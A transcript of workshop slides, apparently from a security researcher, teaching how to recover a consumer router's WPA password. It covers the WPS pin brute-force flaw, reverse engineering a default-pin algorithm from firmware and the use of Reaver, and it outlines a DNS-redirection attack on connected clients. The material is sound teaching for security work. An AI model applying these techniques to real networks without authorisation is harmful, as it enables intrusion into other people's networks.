Embedded device hacking Session i
-
Upload
malachi-jones -
Category
Technology
-
view
32 -
download
1
Transcript of Embedded device hacking Session i
![Page 1: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/1.jpg)
Embedded Device Hacking
Session I: Obtaining Initial Remote Access
By: Malachi Jones, PhD
![Page 2: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/2.jpg)
About Me
Education
Bachelors Degree: Computer Engineering (Univ. of Florida, 2007)
Master’s Degree: Computer Engineering (Georgia Tech, 2009)
PhD: Computer Engineering (Georgia Tech, 2013)
Cyber Security Experience
Harris: Cyber Software Engineer (2013-2014)
Harris: Vulnerability Researcher (2015)
Booz Allen DarkLabs : Embedded Security Researcher (2016- Present)
https://www.linkedin.com/in/malachijonesphd
![Page 3: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/3.jpg)
About Dark Labs
Booz Allen Dark Labs is an elite team of security researchers,
penetration testers, reverse engineers, network
analysts, and data scientists, dedicated to stopping
cyber attacks before they occur.1
(1 http://darklabs.bah.com)
![Page 4: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/4.jpg)
I. Motivation: Ubiquity of embedded devices
II. Objectives of Workshop
III. Workshop Overview
IV. The Workshop: Hacking a consumer router
Session I: Obtaining Initial Remote Access
Session II: Exploitation
Session III: pwnage
V. Conclusion
Outline
![Page 5: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/5.jpg)
Motivation
Ubiquity of Embedded Devices
Critical Infrastructure (Nuclear Power Plant)
Life Critical Systems (Pace Maker)
Financial Infrastructure (Banking & Investing)
Internet of Things (IoT) (IoT Gadgets)
Commercial Products (Network Switch)
Transportation Systems (Jeep)
![Page 6: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/6.jpg)
2015: A Year of Embedded Exploitation
(Link)
![Page 7: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/7.jpg)
(Link)
2016: The Exploitation Continues…
![Page 8: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/8.jpg)
?????
2017: Its Just Getting Started
![Page 9: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/9.jpg)
Objectives of Workshop
Explore practical applications of reverse engineering
Discuss concepts/techniques that hackers utilize to uncover vulns in real-world embedded devices.
Provide a hands-on introduction to key pen-testing tools
![Page 10: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/10.jpg)
Workshop Overview
Want to understand the process of hacking/ pentesting a sophisticated embedded system such as a car?
![Page 11: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/11.jpg)
Workshop Overview
A first step is to first learn how to hack a consumer router
Why?
Its cheaper, so if you make a mistake and brick it, you won’t be out of +60k
Although a simpler system and easier target, the core pentesting principles and processes are similar
![Page 12: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/12.jpg)
Workshop Overview
We’ll focus on a Belkin router (F5D7234-4 version 5)
Its pretty cheap (<$20) and is a pretty soft target that is suitable for individuals new to embedded hacking
![Page 13: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/13.jpg)
Workshop Overview
Overall Hacking Objective:
Compromise an initial target (e.g wifi router) and then use that target as leverage to compromise other targets
![Page 14: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/14.jpg)
Workshop Overview
Steps to Achieve Hacking Objective:
1) Obtain Initial remote access to the device
Wifi Router Context: This means the ability to connect to its network, which often requires knowledge of the wpa password
![Page 15: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/15.jpg)
Workshop Overview
Steps to Achieve Hacking Objective:
2) Escalate privileges on device to admin/root
Wifi Router Context: Administrative privileges can allow us to control/manipulate the IP traffic of clients connected to device
![Page 16: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/16.jpg)
Workshop Overview
Steps to Achieve Hacking Objective:
3) Exploit privileges to compromise other devices
Wifi Router Context: Send clients malicious IP traffic that allows us to compromise them also
![Page 17: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/17.jpg)
Router Exploitation Example (via Redirection Attack)
Step 1: Hacker gains remote access to router
Step 2: Elevates privileges to admin
Step 3: Changes DNS settings on router
Step 4: Router now talks to hacker’s server to resolve name address
Step 5: www.cnn.com now resolves to an IP address of hacker’s server
Step 6: Hacker provides malicious traffic to devices on the network
Step 7:
17
Workshop Overview
Pwned
![Page 18: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/18.jpg)
Workshop Overview
The workshop will be organized into three sessions that capture the pen-testing phases of going from discovery to p0wnage Session I: Discovery of a vulnerability in the WPS
implementation to obtain initial access on device
Session II: Exploring weaknesses in the web management interface to gain administrative access
Session III: Development of a proof of concept that demonstrates how a Windows 7 user can be p0wned via web browser with a maliciously configured router
![Page 19: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/19.jpg)
Router Exploitation Example (via Redirection Attack)
Step 1: Hacker gains remote access to router
Step 2: Elevates privileges to admin
Step 3: Changes DNS settings on router
Step 4: Router now talks to hacker’s server to resolve name address
Step 5: www.cnn.com now resolves to an IP address of hacker’s server
Step 6: Hacker provides malicious traffic to devices on the network
Step 7:
19
Workshop Overview
Pwned
Session I
![Page 20: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/20.jpg)
Router Exploitation Example (via Redirection Attack)
Step 1: Hacker gains remote access to router
Step 2: Elevates privileges to admin
Step 3: Changes DNS settings on router
Step 4: Router now talks to hacker’s server to resolve name address
Step 5: www.cnn.com now resolves to an IP address of hacker’s server
Step 6: Hacker provides malicious traffic to devices on the network
Step 7:
20
Workshop Overview
Pwned
Session II
![Page 21: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/21.jpg)
Router Exploitation Example (via Redirection Attack)
Step 1: Hacker gains remote access to router
Step 2: Elevates privileges to admin
Step 3: Changes DNS settings on router
Step 4: Router now talks to hacker’s server to resolve name address
Step 5: www.cnn.com now resolves to an IP address of hacker’s server
Step 6: Hacker provides malicious traffic to devices on the network
Step 7:
21
Workshop Overview
Pwned
Session III
![Page 22: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/22.jpg)
The Workshop
Hacking a Consumer Router
![Page 23: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/23.jpg)
The Workshop
Session I:
Obtaining Initial Remote Access
to the Device
![Page 24: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/24.jpg)
Session I: Outline
I. Overview
II. Background
III. Required Material
IV. Lab 1: Firmware Data Extraction with Binwalk
V. Lab 2: Reversing/Bug Hunting with IDA Pro
VI. Lab 3: Obtain Initial Access with Wireshark & Reaver
![Page 25: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/25.jpg)
Session I: Overview (tldr)
WPS pin method is on by default on virtually all consumer routers
Design flaw in WPS allows pin to be brute forced in under 11000 attempts
Once a WPS pin is known, a tool such as Reaver can be utilized to retrieve the WPA key instantaneously (see next slide)
On some routers (including F5D7234-4), the default pin can be computed by reverse engineering the pin generation algorithm
![Page 26: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/26.jpg)
Session I: The Big Picture
Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to
router and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
![Page 27: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/27.jpg)
Session I: The Big Picture
Overall goal is to figure out what the router’s WPA password so that we can gain initial access to router
and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 1
![Page 28: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/28.jpg)
Session I: The Big Picture
Overall goal is to figure out what the router’s WPA password so that we can gain initial access to router
and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 2
![Page 29: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/29.jpg)
Session I: The Big Picture
Overall goal is to figure out what the router’s WPA password so that we can gain initial access to router
and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 3
![Page 30: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/30.jpg)
End Result: Gain Access to Management Interface
Session I: The Big Picture
![Page 31: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/31.jpg)
Router Exploitation Example (via Redirection Attack)
Step 1: Hacker gains remote access to router
Step 2: Elevates privileges to admin
Step 3: Changes DNS settings on router
Step 4: Router now talks to hacker’s server to resolve name address
Step 5: www.cnn.com now resolves to an IP address of hacker’s server
Step 6: Hacker provides malicious traffic to devices on the network
Step 7:
31
Session I: The Big Picture
Pwned
Session I
![Page 32: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/32.jpg)
Session I: Outline
I. Overview
II. Background
III. Required Material
IV. Lab 1: Firmware Data Extraction with Binwalk
V. Lab 2: Reversing/Bug Hunting with IDA Pro
VI. Lab 3: Obtain Initial Access with Wireshark & Reaver
![Page 33: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/33.jpg)
Session I: Background
1. WPS Design Flaw Explained
2. Exploiting Belkin’s PIN Generation Algorithm
3. IDA Pro
![Page 34: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/34.jpg)
Background: WPS Explained
Wi-Fi Protected Setup (WPS) was created by Wi-Fi Alliance in 2006
Goal to make it easy for home users to add new devices securely to network w/o entering long passphrases
One of the modes allowed for user to enter the router’s 8 digit pin to connect a desired device to network
![Page 35: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/35.jpg)
Background: WPS Explained
Design Flaw Explained WPS has an 8 digit pin numeric pin (0-9)
Number of attempts to bruteforce an 8 digit pin
1 2 3 4 5 6 7 8
108 = 100 million
![Page 36: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/36.jpg)
Background: WPS Explained
Design Flaw Explained The 8th digit pin is a checksum
Number of attempts to bruteforce a 7 digit pin
1 2 3 4 5 6 7 8
107 = 10 million
![Page 37: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/37.jpg)
Background: WPS Explained
Design Flaw Explained Pin split into two groups and a Nack/ack is sent that indicates if the pin
for that group is correct
Number of attempts to bruteforce a 7 digit pin split into groups( 4+ 3)
1 2 3 4 5 6 7 8
104 + 103= 11000
Nack/ Ack Nack/ Ack
![Page 38: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/38.jpg)
We could exploit this design flaw for the Belkin
router that we are targeting to obtain pin
However, there is a WPS implementation flaw, specific to this router, that allows us to get the pin in 1 try vs 11,000
Background: WPS Explained
![Page 39: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/39.jpg)
Background: Belkin Pin Generation Exploit
Pin generation exploit material presented in this workshop is based on the write-up by Craig @ www.devttys0.com
/DEV/TTYS0 provides excellent material on embedded hacking
in general and router hacking in particular
![Page 40: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/40.jpg)
Background: Belkin Pin Generation Exploit
Belkin WPS Pin Algorithm
Note: Serial ID and WLAN MAC can be obtained by sniffing certain packets that are broadcast by the router
Pin Generation Algorithm
12345678
Serial ID
WLAN MAC
![Page 41: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/41.jpg)
Background: IDA Pro
De facto tool for disassembling, decompiling, and debugging binaries
Supports a wide array of processor architectures that include the following: MIPS
ARM
X86/x64
![Page 42: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/42.jpg)
Code Flow of Routine (sub_43A53C)
Background: IDA Pro Features
![Page 43: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/43.jpg)
Code Flow of Routine (sub_43A53C)
For loop
Loop back Here
Branch taken to effectively exit function if de-referenced value is ‘0’
![Page 44: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/44.jpg)
Background: IDA Pro Features
IDA Scripting support Supports python scripting, which is known as IDAPython
Provides a power way to add extensive utilities and features to python
Also has a native language, IDC, which is a “C-like” language
![Page 45: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/45.jpg)
Decompiling with Hex-Rays (x86,x64, and ARM)
Background: IDA Pro Features
![Page 46: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/46.jpg)
ARM Disassembly
Decompiled “Pseudo- C”
Background: IDA Pro Features
![Page 47: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/47.jpg)
For more information on IDA, there is a pretty awesome book written by Chris Eagle
Background: IDA Pro Features
![Page 48: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/48.jpg)
Professional Edition : $1500
Pro + Hex-rays decompiler (x86/x64 + ARM): $5500
Freeware version (link) Very old edition w/o newer features including IDAPython
only x86 disassembler support
Still a good starting point
Background: Acquiring IDA Pro
![Page 49: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/49.jpg)
Binary Ninja (link) License: $99.00 (Personal License)
Up and coming legitimate alternative/competitor to IDA Pro
Supports x86/x64 , ARM, and MIPS
Decompiler support
OS Platforms: Windows, OSX , and Linux
Background: IDA Pro Alternatives
![Page 50: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/50.jpg)
Background: IDA Pro Alternatives
Binary Ninja Screenshot
![Page 51: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/51.jpg)
I. Overview
II. Background
III. Required Material
IV. Lab 1: Firmware Data Extraction with Binwalk
V. Lab 2: Reversing/Bug Hunting with IDA Pro
VI. Lab 3: Obtain Initial Access with Wireshark & Reaver
Session I: Outline
![Page 52: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/52.jpg)
Required Material
Software
Kali Linux VM 1.X
IDA Pro
Vmware/ VirtualBox
Hardware Belkin F5D7234-4 version 5
Wifi adapter w/ monitor mode
(e.g. TP-LINK TL-WN722N)
![Page 53: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/53.jpg)
Required Material
![Page 54: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/54.jpg)
I. Overview
II. Background
III. Required Material
IV. Big Picture
V. Lab 1: Firmware Data Extraction
VI. Lab 2: Reversing/Bug Hunting with IDA Pro
VII. Lab 3: Obtain Initial Access with Wireshark & Reaver
Session I: Outline
![Page 55: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/55.jpg)
Lab 1: Firmware Data Extraction & Analysis
Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to
router and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 1
![Page 56: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/56.jpg)
Lab 1: Firmware Data Extraction & Analysis
Steps for Extraction & Analysis
1. Install squashfs-tools if not installed
2. Perform initial analysis of firmware w/ Binwalk
3. Extract firmware data
4. Explore the squash file system folder
![Page 57: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/57.jpg)
Extraction and Analysis (Steps)
1) Install squashfs-tools if not installed
(Next Slide)
![Page 58: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/58.jpg)
Install squashfs-tools if not installed
$ sudo apt-get install squashfs-tools
![Page 59: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/59.jpg)
Extraction and Analysis (Steps)
2) Let binwalk do an initial analysis of firmware
(Next Slide)
![Page 60: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/60.jpg)
Initial analysis with Binwalk
$ sudo binwalk DIR810LB1_FW203B02.bin payload);
![Page 61: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/61.jpg)
3) Extract firmware data
(Next Slide)
Extraction and Analysis (Steps)
![Page 62: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/62.jpg)
Extract Firmware Data
$ sudo binwalk –e DIR810LB1_FW203B02.bin
![Page 63: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/63.jpg)
4) Explore files in the squash file system folder
(Next Slides)
Extraction and Analysis (Steps)
![Page 64: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/64.jpg)
Explore squash filesystem
ls –l /$absolute-path-to-squash-folder
![Page 65: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/65.jpg)
Explore squash filesystem
ls –l /$absolute-path-to-squash-folder/sbin
Contains the WPS pin generation logic
![Page 66: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/66.jpg)
Lab 1: Q&A
Why are we using Dlink firmware instead of Belkin? Dlink has symbols (e.g. function names) which makes it easier to follow for
those newer to reversing
Stripped firmware (i.e. no symbols) can be very difficult and take a substantial amount of time to reverse
Pin generation algorithm is conceptually similar between the Dlink and Belkin routers
What is a technique that can be used to help reverse engineer stripped binaries? Make use of the debug strings found in binary to build intuition about what a
routine is doing
![Page 67: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/67.jpg)
Lab 1: Q&A
How did we know the WPS pin generation logic could be found at the following location: /sbin/ncc? Can create an IDAPython script that iterates through the binaries in the
filesystem to search for specific symbols and strings
Strings and symbols of interest could contain “WPS”, “WPS Pin”, “Pin generation” , etc….
How can the firmware be acquired? [Easy] Manufacturer’s website
[Difficult] Manual extraction from the device via JTAG or the serial port (see next 2 slide)
Note: Forge Hackerspace has a workshop on manual firmware extraction !!
![Page 68: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/68.jpg)
Linksys WRT120N PCB (Serial Port)
Serial Port
![Page 69: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/69.jpg)
Linksys WRT120N PCB (Serial Port)
Serial Port
![Page 70: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/70.jpg)
Additional Resources Reverse Engineering Firmware: http://www.devttys0.com/2011/05/reverse-
engineering-firmware-linksys-wag120n/
Lab 1: Firmware Data Extraction
![Page 71: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/71.jpg)
I. Overview
II. Background
III. Required Material
IV. Lab 1: Firmware Data Extraction with Binwalk
V. Lab 2: Reversing with IDA Pro
VI. Lab 3: Obtain Initial Access with Wireshark & Reaver
Session I: Outline
![Page 72: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/72.jpg)
Lab 2: Reversing with IDA Pro
Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to
router and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 2
![Page 73: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/73.jpg)
Description In this lab, we will take a look at the binary ncc, located in /sbin of the
squash filesystem
Since ncc has quite a bit of WPS logic, which includes the pin generation algorithm, we’ll do some exploring
We’ll walk through the process of locating a code segment of interest (wps algorithm) and illustrate the process of reversing the segment into C code
Lab 2: Reversing with IDA Pro
![Page 74: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/74.jpg)
Steps for Bug Hunting and Reversing
1. Load the binary ncc into IDA Pro for analysis
2. Hunt for the pin generation algorithm
3. Analyze the inputs of the algorithm
4. Reverse algorithm segment into C code
Lab 2: Reversing with IDA Pro
![Page 75: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/75.jpg)
1) Load the binary ncc into IDA Pro for
analysis
(Next Slide)
Lab 2: Reversing with IDA Pro (Steps)
![Page 76: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/76.jpg)
Load the binary ncc into IDA Pro
1a. Launch IDA Pro
![Page 77: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/77.jpg)
Load the binary ncc into IDA Pro
1b. Click “New”
![Page 78: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/78.jpg)
Load the binary ncc into IDA Pro
1c. Drag ncc binary into IDA
ncc binary
IDA detects that
binary is a
MIPS ELF
![Page 79: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/79.jpg)
Load the binary ncc into IDA Pro
1d. Click “ok”
![Page 80: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/80.jpg)
Load the binary ncc into IDA Pro
1e. Wait for IDA to finish analyzing the binary
![Page 81: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/81.jpg)
Load the binary ncc into IDA Pro
1f. IDA indicates auto analysis has been finished
Auto analysis
complete
![Page 82: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/82.jpg)
2) Hunt for the pin generation algorithm
(Next Slide)
Reversing with IDA Pro (Steps)
![Page 83: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/83.jpg)
Hunt for the pin generation algorithm
1a. See if you can find the pin generation routine
![Page 84: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/84.jpg)
Hunt for the pin generation algorithm
a. (Hint: What happens when I search for “router” in the Function Window)
Note: Ctrl+F brings up search box Term “router” entered into the function name
filter
![Page 85: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/85.jpg)
a. (Hint: What happens when I search for “router” in the Function Window)
Hunt for the pin generation algorithm
Term “router” entered into the function
name filter
![Page 86: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/86.jpg)
a. (Hint: Try some search terms relevant to the algorithm we’re trying to find)
Try your own search
terms ???
Hunt for the pin generation algorithm
![Page 87: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/87.jpg)
a. (Try a few more keywords before you go to the next slide!!!)
Try your own search terms
???
Hunt for the pin generation algorithm
![Page 88: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/88.jpg)
Hunt for the pin generation algorithm
b. Let’s try the keyword “default” and see what we get
This looks interesting
![Page 89: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/89.jpg)
Hunt for the pin generation algorithm
c. Double click on “get_default_pin”
![Page 90: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/90.jpg)
Hunt for the pin generation algorithm
c. (Continued…)
![Page 91: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/91.jpg)
3) Analyzing the pin algorithm in
subroutine get_default_pin
(Next Slide)
Lab 2: Reversing with IDA Pro (Steps)
![Page 92: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/92.jpg)
Analyze pin generation algorithm
a. Lets examine possible input sources to algorithm
![Page 93: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/93.jpg)
Analyze pin generation algorithm
a. Lets examine possible input sources to algorithm A call is made to a
sub-routine that appears to get some
information
Subset of data from lockAndGetInfo_log
will be formatted as follows: “%c:%:c%:c%….”
![Page 94: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/94.jpg)
Any guesses on what “%c:%c…” might be?
Hunt for the pin generation algorithm
b. Lets take a closer look at the sprintf call
Decompiling by hand to pseudo C
char buffer [….];
char * data =lockAndGetInfo_log->interesting_data_element
……………………………………
sprintf (buffer, “%c%c:%c%c:%c%c:%c%c:%c%c:%c%c”, data[0], data[1],…,data[11]);
![Page 95: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/95.jpg)
Hints
Its 12 characters with a “:” in between each pair of 2 characters
This is a networking device
What is something (e.g. identifier) that each networking devices typically has that would be a good seed for a pin generation algorithm?
Hunt for the pin generation algorithm
c. Figure out what type of data could “%c%c…:%c%c” represent
char buffer [….];
